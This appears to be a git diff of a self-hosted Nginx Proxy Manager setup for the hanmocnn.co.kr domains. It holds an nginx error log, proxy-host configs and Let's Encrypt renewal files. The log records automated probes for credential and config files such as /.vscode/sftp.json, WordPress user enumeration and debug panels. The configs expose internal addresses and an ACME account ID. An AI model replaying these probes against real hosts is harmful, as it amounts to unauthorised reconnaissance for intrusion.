2026/02/15 01:52:34 [error] 430#430: *3797 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /swagger/index.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/index.html", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:35 [error] 430#430: *3799 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /swagger/swagger-ui.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/swagger-ui.html", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:35 [error] 428#428: *3801 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /swagger-ui.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger-ui.html", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:36 [error] 430#430: *3803 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /webjars/swagger-ui/index.html HTTP/1.1", upstream: "http://192.168.0.250:3000/webjars/swagger-ui/index.html", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:36 [error] 430#430: *3805 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /swagger/index.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/index.html", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:37 [error] 430#430: *3807 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger.json", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:37 [error] 430#430: *3809 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /swagger/swagger-ui.html HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/swagger-ui.html", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:38 [error] 430#430: *3811 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /swagger/v1/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/v1/swagger.json", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:38 [error] 430#430: *3813 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /webjars/swagger-ui/index.html HTTP/1.1", upstream: "http://192.168.0.250:3000/webjars/swagger-ui/index.html", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:39 [error] 430#430: *3815 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /v2/api-docs HTTP/1.1", upstream: "http://192.168.0.250:3000/v2/api-docs", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:39 [error] 430#430: *3817 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger.json", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:40 [error] 430#430: *3819 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /v3/api-docs HTTP/1.1", upstream: "http://192.168.0.250:3000/v3/api-docs", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:40 [error] 430#430: *3821 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /swagger/v1/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/swagger/v1/swagger.json", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:41 [error] 430#430: *3823 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /api-docs/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/api-docs/swagger.json", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:41 [error] 430#430: *3825 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /v2/api-docs HTTP/1.1", upstream: "http://192.168.0.250:3000/v2/api-docs", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:42 [error] 430#430: *3827 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /api/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/api/swagger.json", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:42 [error] 430#430: *3830 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /v3/api-docs HTTP/1.1", upstream: "http://192.168.0.250:3000/v3/api-docs", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:43 [error] 430#430: *3832 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /@vite/env HTTP/1.1", upstream: "http://192.168.0.250:3000/@vite/env", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:43 [error] 430#430: *3834 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /api-docs/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/api-docs/swagger.json", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:44 [error] 430#430: *3836 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /.vscode/sftp.json HTTP/1.1", upstream: "http://192.168.0.250:3000/.vscode/sftp.json", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:44 [error] 430#430: *3838 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /api/swagger.json HTTP/1.1", upstream: "http://192.168.0.250:3000/api/swagger.json", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:45 [error] 430#430: *3840 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "OPTIONS / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:45 [error] 430#430: *3842 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /@vite/env HTTP/1.1", upstream: "http://192.168.0.250:3000/@vite/env", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:46 [error] 430#430: *3844 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /?rest_route=/wp/v2/users/ HTTP/1.1", upstream: "http://192.168.0.250:3000/?rest_route=/wp/v2/users/", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:46 [error] 430#430: *3846 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /.vscode/sftp.json HTTP/1.1", upstream: "http://192.168.0.250:3000/.vscode/sftp.json", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:47 [error] 430#430: *3848 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /debug/default/view?panel=config HTTP/1.1", upstream: "http://192.168.0.250:3000/debug/default/view?panel=config", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:47 [error] 430#430: *3850 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "OPTIONS / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:48 [error] 430#430: *3852 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /?rest_route=/wp/v2/users/ HTTP/1.1", upstream: "http://192.168.0.250:3000/?rest_route=/wp/v2/users/", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:52:49 [error] 430#430: *3854 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /debug/default/view?panel=config HTTP/1.1", upstream: "http://192.168.0.250:3000/debug/default/view?panel=config", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:53:44 [error] 480#480: *3879 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "http://git.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 01:53:47 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:53:47 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 01:53:49 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:53:49 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 01:53:50 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:53:50 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 01:54:02 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:54:02 [error] 481#481: *3881 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 01:54:17 [error] 493#493: *3900 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:54:17 [error] 493#493: *3900 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/"
|
||||||
|
2026/02/15 01:56:08 [error] 506#506: *3954 connect() failed (111: Connection refused) while connecting to upstream, client: 54.86.115.253, server: git.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr:443"
|
||||||
|
2026/02/15 01:56:15 [error] 506#506: *3957 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage.git/info/refs?service=git-upload-pack HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage.git/info/refs?service=git-upload-pack", host: "git.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:58:15 [error] 506#506: *3964 connect() failed (111: Connection refused) while connecting to upstream, client: 146.70.185.32, server: git.hanmocnn.co.kr, request: "HEAD / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr"
|
||||||
91
npm/data/nginx/proxy_host/1.conf
Normal file
91
npm/data/nginx/proxy_host/1.conf
Normal file
@@ -0,0 +1,91 @@
|
|||||||
|
# ------------------------------------------------------------
|
||||||
|
# hanmocnn.co.kr, www.hanmocnn.co.kr
|
||||||
|
# ------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
map $scheme $hsts_header {
|
||||||
|
https "max-age=63072000; preload";
|
||||||
|
}
|
||||||
|
|
||||||
|
server {
|
||||||
|
set $forward_scheme http;
|
||||||
|
set $server "192.168.0.250";
|
||||||
|
set $port 8081;
|
||||||
|
|
||||||
|
listen 80;
|
||||||
|
listen [::]:80;
|
||||||
|
|
||||||
|
listen 443 ssl;
|
||||||
|
listen [::]:443 ssl;
|
||||||
|
|
||||||
|
|
||||||
|
server_name hanmocnn.co.kr www.hanmocnn.co.kr;
|
||||||
|
|
||||||
|
http2 on;
|
||||||
|
|
||||||
|
|
||||||
|
# Let's Encrypt SSL
|
||||||
|
include conf.d/include/letsencrypt-acme-challenge.conf;
|
||||||
|
include conf.d/include/ssl-cache.conf;
|
||||||
|
include conf.d/include/ssl-ciphers.conf;
|
||||||
|
ssl_certificate /etc/letsencrypt/live/npm-1/fullchain.pem;
|
||||||
|
ssl_certificate_key /etc/letsencrypt/live/npm-1/privkey.pem;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Block Exploits
|
||||||
|
include conf.d/include/block-exploits.conf;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# HSTS (ngx_http_headers_module is required) (63072000 seconds = 2 years)
|
||||||
|
add_header Strict-Transport-Security $hsts_header always;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Force SSL
|
||||||
|
include conf.d/include/force-ssl.conf;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
access_log /data/logs/proxy-host-1_access.log proxy;
|
||||||
|
error_log /data/logs/proxy-host-1_error.log warn;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
location / {
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# HSTS (ngx_http_headers_module is required) (63072000 seconds = 2 years)
|
||||||
|
add_header Strict-Transport-Security $hsts_header always;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Proxy!
|
||||||
|
include conf.d/include/proxy.conf;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
# Custom
|
||||||
|
include /data/nginx/custom/server_proxy[.]conf;
|
||||||
|
}
|
||||||
|
|
||||||
84
npm/data/nginx/proxy_host/2.conf
Normal file
84
npm/data/nginx/proxy_host/2.conf
Normal file
@@ -0,0 +1,84 @@
|
|||||||
|
# ------------------------------------------------------------
|
||||||
|
# asset.hanmocnn.co.kr
|
||||||
|
# ------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
map $scheme $hsts_header {
|
||||||
|
https "max-age=63072000; preload";
|
||||||
|
}
|
||||||
|
|
||||||
|
server {
|
||||||
|
set $forward_scheme http;
|
||||||
|
set $server "192.168.0.250";
|
||||||
|
set $port 8000;
|
||||||
|
|
||||||
|
listen 80;
|
||||||
|
listen [::]:80;
|
||||||
|
|
||||||
|
listen 443 ssl;
|
||||||
|
listen [::]:443 ssl;
|
||||||
|
|
||||||
|
|
||||||
|
server_name asset.hanmocnn.co.kr;
|
||||||
|
|
||||||
|
http2 on;
|
||||||
|
|
||||||
|
|
||||||
|
# Let's Encrypt SSL
|
||||||
|
include conf.d/include/letsencrypt-acme-challenge.conf;
|
||||||
|
include conf.d/include/ssl-cache.conf;
|
||||||
|
include conf.d/include/ssl-ciphers.conf;
|
||||||
|
ssl_certificate /etc/letsencrypt/live/npm-2/fullchain.pem;
|
||||||
|
ssl_certificate_key /etc/letsencrypt/live/npm-2/privkey.pem;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Block Exploits
|
||||||
|
include conf.d/include/block-exploits.conf;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Force SSL
|
||||||
|
include conf.d/include/force-ssl.conf;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
access_log /data/logs/proxy-host-2_access.log proxy;
|
||||||
|
error_log /data/logs/proxy-host-2_error.log warn;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
location / {
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Proxy!
|
||||||
|
include conf.d/include/proxy.conf;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
# Custom
|
||||||
|
include /data/nginx/custom/server_proxy[.]conf;
|
||||||
|
}
|
||||||
128
npm/data/nginx/proxy_host/3.conf
Normal file
128
npm/data/nginx/proxy_host/3.conf
Normal file
@@ -0,0 +1,128 @@
|
|||||||
|
# ------------------------------------------------------------
|
||||||
|
# mail.hanmocnn.co.kr
|
||||||
|
# ------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
map $scheme $hsts_header {
|
||||||
|
https "max-age=63072000; preload";
|
||||||
|
}
|
||||||
|
|
||||||
|
server {
|
||||||
|
set $forward_scheme https;
|
||||||
|
set $server "192.168.0.250";
|
||||||
|
set $port 8443;
|
||||||
|
|
||||||
|
listen 80;
|
||||||
|
listen [::]:80;
|
||||||
|
|
||||||
|
listen 443 ssl;
|
||||||
|
listen [::]:443 ssl;
|
||||||
|
|
||||||
|
|
||||||
|
server_name mail.hanmocnn.co.kr;
|
||||||
|
|
||||||
|
http2 on;
|
||||||
|
|
||||||
|
|
||||||
|
# Let's Encrypt SSL
|
||||||
|
include conf.d/include/letsencrypt-acme-challenge.conf;
|
||||||
|
include conf.d/include/ssl-cache.conf;
|
||||||
|
include conf.d/include/ssl-ciphers.conf;
|
||||||
|
ssl_certificate /etc/letsencrypt/live/npm-4/fullchain.pem;
|
||||||
|
ssl_certificate_key /etc/letsencrypt/live/npm-4/privkey.pem;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Block Exploits
|
||||||
|
include conf.d/include/block-exploits.conf;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Force SSL
|
||||||
|
include conf.d/include/force-ssl.conf;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
proxy_set_header Upgrade $http_upgrade;
|
||||||
|
proxy_set_header Connection $http_connection;
|
||||||
|
proxy_http_version 1.1;
|
||||||
|
|
||||||
|
|
||||||
|
access_log /data/logs/proxy-host-3_access.log proxy;
|
||||||
|
error_log /data/logs/proxy-host-3_error.log warn;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
location /rc/ {
|
||||||
|
|
||||||
|
|
||||||
|
proxy_set_header Host $host;
|
||||||
|
proxy_set_header X-Forwarded-Scheme $scheme;
|
||||||
|
proxy_set_header X-Forwarded-Proto $scheme;
|
||||||
|
proxy_set_header X-Forwarded-For $remote_addr;
|
||||||
|
proxy_set_header X-Real-IP $remote_addr;
|
||||||
|
|
||||||
|
proxy_pass https://192.168.0.250:8443;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Block Exploits
|
||||||
|
include conf.d/include/block-exploits.conf;
|
||||||
|
|
||||||
|
|
||||||
|
# Force SSL
|
||||||
|
include conf.d/include/force-ssl.conf;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
proxy_set_header Upgrade $http_upgrade;
|
||||||
|
proxy_set_header Connection $http_connection;
|
||||||
|
proxy_http_version 1.1;
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
location / {
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
proxy_set_header Upgrade $http_upgrade;
|
||||||
|
proxy_set_header Connection $http_connection;
|
||||||
|
proxy_http_version 1.1;
|
||||||
|
|
||||||
|
|
||||||
|
# Proxy!
|
||||||
|
include conf.d/include/proxy.conf;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
# Custom
|
||||||
|
include /data/nginx/custom/server_proxy[.]conf;
|
||||||
|
}
|
||||||
85
npm/data/nginx/proxy_host/4.conf
Normal file
85
npm/data/nginx/proxy_host/4.conf
Normal file
@@ -0,0 +1,85 @@
|
|||||||
|
# ------------------------------------------------------------
|
||||||
|
# git.hanmocnn.co.kr
|
||||||
|
# ------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
map $scheme $hsts_header {
|
||||||
|
https "max-age=63072000; preload";
|
||||||
|
}
|
||||||
|
|
||||||
|
server {
|
||||||
|
set $forward_scheme http;
|
||||||
|
set $server "192.168.0.250";
|
||||||
|
set $port 3000;
|
||||||
|
|
||||||
|
listen 80;
|
||||||
|
listen [::]:80;
|
||||||
|
|
||||||
|
listen 443 ssl;
|
||||||
|
listen [::]:443 ssl;
|
||||||
|
|
||||||
|
|
||||||
|
server_name git.hanmocnn.co.kr;
|
||||||
|
|
||||||
|
http2 on;
|
||||||
|
|
||||||
|
|
||||||
|
# Let's Encrypt SSL
|
||||||
|
include conf.d/include/letsencrypt-acme-challenge.conf;
|
||||||
|
include conf.d/include/ssl-cache.conf;
|
||||||
|
include conf.d/include/ssl-ciphers.conf;
|
||||||
|
ssl_certificate /etc/letsencrypt/live/npm-7/fullchain.pem;
|
||||||
|
ssl_certificate_key /etc/letsencrypt/live/npm-7/privkey.pem;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Block Exploits
|
||||||
|
include conf.d/include/block-exploits.conf;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Force SSL
|
||||||
|
include conf.d/include/force-ssl.conf;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
access_log /data/logs/proxy-host-4_access.log proxy;
|
||||||
|
error_log /data/logs/proxy-host-4_error.log warn;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
location / {
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Proxy!
|
||||||
|
include conf.d/include/proxy.conf;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
# Custom
|
||||||
|
include /data/nginx/custom/server_proxy[.]conf;
|
||||||
|
}
|
||||||
|
|
||||||
20
npm/letsencrypt/renewal/npm-1.conf
Normal file
20
npm/letsencrypt/renewal/npm-1.conf
Normal file
@@ -0,0 +1,20 @@
|
|||||||
|
version = 5.3.0
|
||||||
|
archive_dir = /etc/letsencrypt/archive/npm-1
|
||||||
|
cert = /etc/letsencrypt/live/npm-1/cert.pem
|
||||||
|
privkey = /etc/letsencrypt/live/npm-1/privkey.pem
|
||||||
|
chain = /etc/letsencrypt/live/npm-1/chain.pem
|
||||||
|
fullchain = /etc/letsencrypt/live/npm-1/fullchain.pem
|
||||||
|
[renewalparams]
|
||||||
|
account = ce2ddac5740bb12d4d6591b7fa1728af
|
||||||
|
key_type = ecdsa
|
||||||
|
elliptic_curve = secp384r1
|
||||||
|
preferred_chain = ISRG Root X1
|
||||||
|
pref_challs = http-01,
|
||||||
|
config_dir = /etc/letsencrypt
|
||||||
|
work_dir = /tmp/letsencrypt-lib
|
||||||
|
logs_dir = /data/logs
|
||||||
|
authenticator = webroot
|
||||||
|
webroot_path = /data/letsencrypt-acme-challenge,
|
||||||
|
server = https://acme-v02.api.letsencrypt.org/directory
|
||||||
|
[[webroot_map]]
|
||||||
|
www.hanmocnn.co.kr = /data/letsencrypt-acme-challenge
|
||||||
20
npm/letsencrypt/renewal/npm-2.conf
Normal file
20
npm/letsencrypt/renewal/npm-2.conf
Normal file
@@ -0,0 +1,20 @@
|
|||||||
|
version = 5.3.0
|
||||||
|
archive_dir = /etc/letsencrypt/archive/npm-2
|
||||||
|
cert = /etc/letsencrypt/live/npm-2/cert.pem
|
||||||
|
privkey = /etc/letsencrypt/live/npm-2/privkey.pem
|
||||||
|
chain = /etc/letsencrypt/live/npm-2/chain.pem
|
||||||
|
fullchain = /etc/letsencrypt/live/npm-2/fullchain.pem
|
||||||
|
[renewalparams]
|
||||||
|
account = ce2ddac5740bb12d4d6591b7fa1728af
|
||||||
|
key_type = ecdsa
|
||||||
|
elliptic_curve = secp384r1
|
||||||
|
preferred_chain = ISRG Root X1
|
||||||
|
pref_challs = http-01,
|
||||||
|
config_dir = /etc/letsencrypt
|
||||||
|
work_dir = /tmp/letsencrypt-lib
|
||||||
|
logs_dir = /data/logs
|
||||||
|
authenticator = webroot
|
||||||
|
webroot_path = /data/letsencrypt-acme-challenge,
|
||||||
|
server = https://acme-v02.api.letsencrypt.org/directory
|
||||||
|
[[webroot_map]]
|
||||||
|
asset.hanmocnn.co.kr = /data/letsencrypt-acme-challenge
|
||||||
20
npm/letsencrypt/renewal/npm-4.conf
Normal file
20
npm/letsencrypt/renewal/npm-4.conf
Normal file
@@ -0,0 +1,20 @@
|
|||||||
|
version = 5.3.0
|
||||||
|
archive_dir = /etc/letsencrypt/archive/npm-4
|
||||||
|
cert = /etc/letsencrypt/live/npm-4/cert.pem
|
||||||
|
privkey = /etc/letsencrypt/live/npm-4/privkey.pem
|
||||||
|
chain = /etc/letsencrypt/live/npm-4/chain.pem
|
||||||
|
fullchain = /etc/letsencrypt/live/npm-4/fullchain.pem
|
||||||
|
[renewalparams]
|
||||||
|
account = ce2ddac5740bb12d4d6591b7fa1728af
|
||||||
|
key_type = ecdsa
|
||||||
|
elliptic_curve = secp384r1
|
||||||
|
preferred_chain = ISRG Root X1
|
||||||
|
pref_challs = http-01,
|
||||||
|
config_dir = /etc/letsencrypt
|
||||||
|
work_dir = /tmp/letsencrypt-lib
|
||||||
|
logs_dir = /data/logs
|
||||||
|
authenticator = webroot
|
||||||
|
webroot_path = /data/letsencrypt-acme-challenge,
|
||||||
|
server = https://acme-v02.api.letsencrypt.org/directory
|
||||||
|
[[webroot_map]]
|
||||||
|
mail.hanmocnn.co.kr = /data/letsencrypt-acme-challenge
|
||||||
20
npm/letsencrypt/renewal/npm-6.conf
Normal file
20
npm/letsencrypt/renewal/npm-6.conf
Normal file
@@ -0,0 +1,20 @@
|
|||||||
|
version = 5.3.0
|
||||||
|
archive_dir = /etc/letsencrypt/archive/npm-6
|
||||||
|
cert = /etc/letsencrypt/live/npm-6/cert.pem
|
||||||
|
privkey = /etc/letsencrypt/live/npm-6/privkey.pem
|
||||||
|
chain = /etc/letsencrypt/live/npm-6/chain.pem
|
||||||
|
fullchain = /etc/letsencrypt/live/npm-6/fullchain.pem
|
||||||
|
[renewalparams]
|
||||||
|
account = ce2ddac5740bb12d4d6591b7fa1728af
|
||||||
|
key_type = ecdsa
|
||||||
|
elliptic_curve = secp384r1
|
||||||
|
preferred_chain = ISRG Root X1
|
||||||
|
pref_challs = http-01,
|
||||||
|
config_dir = /etc/letsencrypt
|
||||||
|
work_dir = /tmp/letsencrypt-lib
|
||||||
|
logs_dir = /data/logs
|
||||||
|
authenticator = webroot
|
||||||
|
webroot_path = /data/letsencrypt-acme-challenge,
|
||||||
|
server = https://acme-v02.api.letsencrypt.org/directory
|
||||||
|
[[webroot_map]]
|
||||||
|
git.hanmocnn.co.kr = /data/letsencrypt-acme-challenge
|
||||||
19
npm/letsencrypt/renewal/npm-7.conf
Normal file
19
npm/letsencrypt/renewal/npm-7.conf
Normal file
@@ -0,0 +1,19 @@
|
|||||||
|
version = 5.3.0
|
||||||
|
archive_dir = /etc/letsencrypt/archive/npm-7
|
||||||
|
